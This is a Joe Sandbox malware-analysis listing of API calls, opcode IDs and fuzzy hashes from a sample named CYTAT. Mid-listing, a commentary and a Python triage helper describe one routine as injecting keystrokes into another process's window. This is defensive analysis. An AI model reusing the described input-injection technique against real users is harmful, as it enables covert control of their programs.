                                                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                • __freefls@4.LIBCMT ref: 00413D74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                • String ID:
                                                • API String ID: 259663610-0
                                                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004302E6
                                                • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                • GetClientRect.USER32(?,?), ref: 00430364
                                                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                • GetWindowRect.USER32(?,?), ref: 004303C3
                                                • ScreenToClient.USER32(?,?), ref: 004303EC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                • String ID:
                                                • API String ID: 3220332590-0
                                                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                • String ID:
                                                • API String ID: 1612042205-0
                                                • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove_strncmp
                                                • String ID: >$U$\
                                                • API String ID: 2666721431-237099441
                                                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044C570
                                                • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$InputSend
                                                • String ID:
                                                • API String ID: 2221674350-0
                                                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
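The record above (GetKeyboardState/SetKeyboardState, then PostMessageW with WM_KEYDOWN 0x100, WM_SYSKEYDOWN 0x104 and WM_CHAR 0x102, then SendInput) has the shape of a routine that types into another process's window. The Python below is an added triage helper, not Joe Sandbox tooling and not code from the sample: it parses function records in the format printed on this page, resolves the numeric message arguments to their standard Win32 names, flags records that synthesize keyboard input, and reads the image bitness off SendInput's cbSize argument (28 bytes for the 32-bit INPUT structure, 40 for the 64-bit one). The two sample records are copied from this report; the injection heuristic and the function names are assumptions of this example.

```python
"""Triage helper for Joe Sandbox function records (added example, not Joe Sandbox's own code)."""
import re

# Standard Win32 message constants (winuser.h / commctrl.h) for the values seen in the records.
# WM_USER-range values (0x0400 and up) are control-specific; the names assume the
# common-controls classes (progress bar, list view, tree view, tab control).
MESSAGE_NAMES = {
    0x00F1: "BM_SETCHECK",
    0x0100: "WM_KEYDOWN",
    0x0102: "WM_CHAR",
    0x0104: "WM_SYSKEYDOWN",
    0x0409: "PBM_SETBARCOLOR",   # WM_USER + 9
    0x1024: "LVM_SETTEXTCOLOR",  # LVM_FIRST + 36
    0x111E: "TVM_SETTEXTCOLOR",  # TV_FIRST + 30
    0x1303: "TCM_SETIMAGELIST",  # TCM_FIRST + 3
    0x130C: "TCM_SETCURSEL",     # TCM_FIRST + 12
}
KEY_MESSAGES = {"WM_KEYDOWN", "WM_KEYUP", "WM_SYSKEYDOWN", "WM_SYSKEYUP", "WM_CHAR"}
MESSAGE_APIS = {"SendMessageW", "SendMessageA", "PostMessageW", "PostMessageA"}

# One report line per API call: "• Api.MODULE(args), ref: 0044C5D5" (args are optional).
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# Metadata line: "• Key: value".
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)\s*$")


def parse_records(text):
    """Split a function listing into records; 'Instruction Fuzzy Hash' closes each one."""
    records, cur = [], {"apis": [], "fields": {}}
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            cur["apis"].append({"api": m.group("api"), "module": m.group("module"),
                                "args": args, "ref": int(m.group("ref"), 16)})
            continue
        m = FIELD_LINE.match(line)
        if m:
            cur["fields"][m.group("key")] = m.group("value")
            if m.group("key") == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = {"apis": [], "fields": {}}
    return records


def message_name(arg):
    """Resolve a hex message argument to its Win32 name; '?' (unrecovered) and unknowns pass through."""
    try:
        value = int(arg, 16)
    except ValueError:
        return arg
    return MESSAGE_NAMES.get(value, f"0x{value:04X}")


def window_messages(record):
    """Names of the messages a record sends or posts (second argument of each call)."""
    return [message_name(c["args"][1]) for c in record["apis"]
            if c["api"] in MESSAGE_APIS and len(c["args"]) > 1]


def keystroke_injection(record):
    """Heuristic: the record posts key messages or calls SendInput."""
    apis = {c["api"] for c in record["apis"]}
    return bool(set(window_messages(record)) & KEY_MESSAGES) or "SendInput" in apis


def sendinput_bitness(record):
    """Infer image bitness from SendInput's cbSize argument: sizeof(INPUT) is 28 on x86, 40 on x64."""
    for c in record["apis"]:
        if c["api"] == "SendInput" and len(c["args"]) == 3 and c["args"][2] != "?":
            return {28: 32, 40: 64}.get(int(c["args"][2], 16))
    return None


# Sample input: two records copied from the report above, trimmed to the lines this helper reads.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
Similarity
• API ID: MessagePost$KeyboardState$InputSend
• Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
APIs
• SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
• SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
• SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
• InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
• Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec["fields"].get("Instruction Fuzzy Hash", "")[:16],
              window_messages(rec), keystroke_injection(rec), sendinput_bitness(rec))
```

Feeding the whole function listing through parse_records groups the records by capability before pivoting on the Instruction Fuzzy Hash values for similarity searches against other samples.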
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcscpy$_wcscat
                                                • String ID:
                                                • API String ID: 2037614760-0
                                                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$AllocClearErrorLastString
                                                • String ID:
                                                • API String ID: 960795272-0
                                                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                APIs
                                                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                • String ID:
                                                • API String ID: 4189319755-0
                                                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                APIs
                                                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                • String ID:
                                                • API String ID: 1976402638-0
                                                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                APIs
                                                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$ClearErrorLast
                                                • String ID: NULL Pointer assignment$Not an Object type
                                                • API String ID: 2487901850-572801152
                                                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                APIs
                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Enable$Show$MessageSend
                                                • String ID:
                                                • API String ID: 1871949834-0
                                                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
